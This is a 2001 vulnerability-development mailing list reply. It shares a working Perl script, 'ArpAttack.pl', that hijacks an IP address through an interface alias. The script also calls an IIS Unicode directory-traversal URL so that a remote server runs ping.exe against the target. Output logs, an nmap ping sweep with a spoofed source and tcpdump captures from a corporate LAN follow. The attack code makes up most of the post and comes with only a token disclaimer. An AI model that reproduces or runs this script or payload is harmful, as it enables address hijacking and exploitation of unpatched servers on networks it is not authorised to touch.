Vulnerability Development mailing list archives

Re: Hijack IP Address using cable modem

From: cdowns <cdowns () SKILLSOFT COM>
Date: Thu, 29 Mar 2001 09:33:43 -0500

playing around on my corporate LAN is gravy to accomplish this. Mediaone
was a little more difficult but i wrote this little script to automate
it ( this one works :)) here is my output:

setting up network spoof ....
ifconfig interface eth0:0 for spoof... .
----------------------------------------
eth0:0    Link encap:Ethernet  HWaddr 00:10:A4:C4:23:45
          inet addr:10.0.2.70  Bcast:10.0.3.255  Mask:255.255.254.0
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          Interrupt:3 Base address:0x300

wait.. . using target to send icmp request.
-------------------------------------------
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255

Ping statistics for 10.0.2.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

done
happy spoofing dud3z ~!
[root@scavenger /root]#

perl script.

#!/usr/bin/perl -w

# ArpAttack.pl by: Christopher M Downs 04-28-01
# ---------------------------------------------
# This program was inspired by a thread that started on
vuln-dev () securityfocus com
# most cable networks have ARP Broadcasts enabled so arp spoofing works
on that network
# this is a proof of concept program and is intended for educational
purposes only therefore !
# i am not responsible for anything bad or just plain evil done with
this program.
# enough said you know the rules.
# -D
system ("clear");

use LWP::Simple;
use Getopt::Std;
getopts("t:n:b:u:?", \%args);

if ( $args{t} ) {
    $target = $args{t};
} else {
    Usage();
}
if ( $args{"?"} ){
    Usage();
}
# <---------------------------------------
## this is where we need to create a network alias on the local machine\

## for the network target we would like to spoof.
## we will cheat for now and use system calls just for the sake of
getting something that works....
if ( $args{n} ) {
    $netmask = $args{n};
}
if ( $args{b} ) {
    $broadcast = $args{b};
}
print "setting up network spoof .... \n";
sleep 2;
# system call here.
system("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast
$broadcast");
print ("ifconfig interface eth0:0 for spoof... .\n");
print ("----------------------------------------\n");
system("/sbin/ifconfig eth0:0");

# use uni-code server for icmp to spoofed host.
# <---------------------------------------
if ( $args{u} ) {
    $host_slut = $args{u};
    $uni_target =
get("http://$host_slut/scripts/..%c0%af../winnt/system32/ping.exe?+$target";);

    print "wait.. . using target to send icmp request.\n";
    print "-------------------------------------------\n";
    print ("$uni_target\n");
}
print "done\n";
print "happy spoofing dud3z ~!\n";
# <---------------------------------------
sub Usage {
    print <<USAGE;
  Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server>
      -? this menu
      -t <target to spoof>
      -n netmask
      -b broadcast
      -u uni-code server to use
 Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b
192.168.0.255 -u 192.168.20.x
 Note: this program needs to be run as root
USAGE
    exit;
}

nslookup of of targets dns:
[root@scavenger /root]# nslookup scriptor.corp.skillsoft.com
Server:  dns.corp.skillsoft.com
Address:  10.0.2.78

Name:    scriptor.corp.skillsoft.com
Address:  10.0.2.70

[root@scavenger /root]#

reply from tcpdump session while doing pingsweep of network::
[root@scavenger /root]# nmap -S 10.0.2.70 -sP 10.0.2.2-100

[root@scavenger /root]# tcpdump -i eth0:0 -p icmp
Kernel filter, protocol ALL, raw packet socket
tcpdump: listening on eth0:0
09:19:10.730838 scriptor.corp.skillsoft.com > dns.corp.skillsoft.com:
icmp: echo request
09:19:10.731211 dns.corp.skillsoft.com > scriptor.corp.skillsoft.com:
icmp: echo reply
09:19:10.733107 scriptor.corp.skillsoft.com > dns2.corp.skillsoft.com:
icmp: echo request
09:19:10.733461 dns2.corp.skillsoft.com > scriptor.corp.skillsoft.com:
icmp: echo reply
09:19:10.740784 scriptor.corp.skillsoft.com > acd.corp.skillsoft.com:
icmp: echo request
09:19:10.741454 scriptor.corp.skillsoft.com > 10.0.2.98: icmp: echo
request
09:19:10.742037 acd.corp.skillsoft.com > scriptor.corp.skillsoft.com:
icmp: echo reply
09:19:10.742089 10.0.2.98 > scriptor.corp.skillsoft.com: icmp: echo
reply

and obviously i get the replys on my end from nmap.

-D

Current thread:

Re: Hijack IP Address using cable modem, (continued)
- - - Re: Hijack IP Address using cable modem Reb (Mar 29)
    - Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
    - Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
    - Re: Hijack IP Address using cable modem Nick Summy (Mar 29)
    - Re: Hijack IP Address using cable modem David Laganière (Mar 29)
    - Re: Hijack IP Address using cable modem Clayton Hoskinson (Mar 29)
    - Re: Hijack IP Address using cable modem moksha faced (Mar 29)
- Re: Hijack IP Address using cable modem cdowns (Mar 28)
- Re: Hijack IP Address using cable modem Patrick Maartense (Mar 28)
- Re: Hijack IP Address using cable modem Williamson, Glenn (Mar 29)
  - Re: Hijack IP Address using cable modem cdowns (Mar 29)